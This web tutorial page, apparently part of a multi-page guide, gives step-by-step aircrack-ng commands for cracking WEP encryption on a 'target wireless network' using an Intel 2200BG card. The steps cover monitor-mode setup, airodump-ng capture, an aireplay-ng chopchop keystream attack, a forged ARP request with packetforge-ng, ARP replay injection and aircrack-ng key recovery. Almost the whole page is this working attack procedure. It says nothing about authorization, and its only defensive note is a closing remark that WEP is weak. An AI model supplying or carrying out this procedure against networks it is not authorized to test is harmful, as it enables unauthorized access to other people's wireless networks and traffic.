Cracking WEP using Intel® PRO/Wireless 2200BG

Configuring the wireless Card

9a. Install the ipw2200 module into the kernel (assuming the network card that you have is an Intel based card) by issuing the following command in the current directory

[rmmod ipw2200] <Enter>                         #disables the card
[modprobe ipw2200 rtap_iface=1] <Enter>         #configure the card to sniff traffic

Note. You will need the MAC address(BSSID) and the name of the wireless Access Point(ESSID) and the Channel number of your target wireless network.

To get these just issue the following commands in the terminal

[airodump eth1]
This will list all the available wireless networks around together with their BSSID, ESSID and Channels as shown in see p6.jpg

p6.jpg

9b. Enable the wireless card and configure its wireless settings to those shown in the following command

[ifconfig eth1 up] <Enter>
[iwconfig eth1 essid <ESSID> key s:fakekey mode managed]

where fakekey is any string of your choice.

Time to “Attack”

1. Now start collecting wireless traffic on the interface and store the captured packates in a file, I stored mine in dump
   [airodump-ng --bssid <BSSID> -w dump rtap0]
2. Now for the actual injection open a new terminal like you did previously and type in the following command. For the following command, you will need the
   MAC address of your network card, you can get it by typing

   [aireplay-ng -4 -a <BSSID> -h <MAC> -i rtap0 eth1]

3. A prompt will ask you to use “this” packet. Type “y” and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream(.xor) file.
   The keystream file will look something like “replay_dec-######.xor”
4. When the command is completed, if you get a message that says”Warning : ICV Checksum verification FAILED“, run the previous command again until you get a SUCCESS message(see p9.jpg)
   

   p9.jpg

5. The previous command will have created a couple of files with names replay_dec-####.xor(.cap) Now we will create an arp-request packet using the acquired keysteam file.
   The “-l” and “-k” options are the source IP and destination IP. They can be any valid IP in your network. The destination can be the gateway (router IP) but the attack run faster if it is an arbitrary IP.

   [packetforge-ng -0 -a <AP MAC> -h <MAC> -k 192.168.1.100 -l 192.168.1.101 -y replay_dec-####.xor -w arp-request]

Now for the break-in

Finally we will send ou newly created arp-request packet over and over. After this step you should see the “Data” begin to rise quickly back in the first terminal (airodump).
If the data doesn’t change (usually between 80 and 350 per second) then something is wrong.(p10.jpg)

p10.jpg

[aireplay-ng -2 -r arp-request eth1]

15. Let aireplay run for a few minutes while you collect data. After 75,000(p11.jpg) or so data packaets you can run aircrack in a new terminal.

aircrack-ng -z dump*.cap

This will give you the WEP key in couple of minutes as shown in the figure below :

Given how easy it is to crack WEP security, it is amazing that some people still use it, I just hope you are not one of them.

Continue to .. Page 1 Page 2 Page 3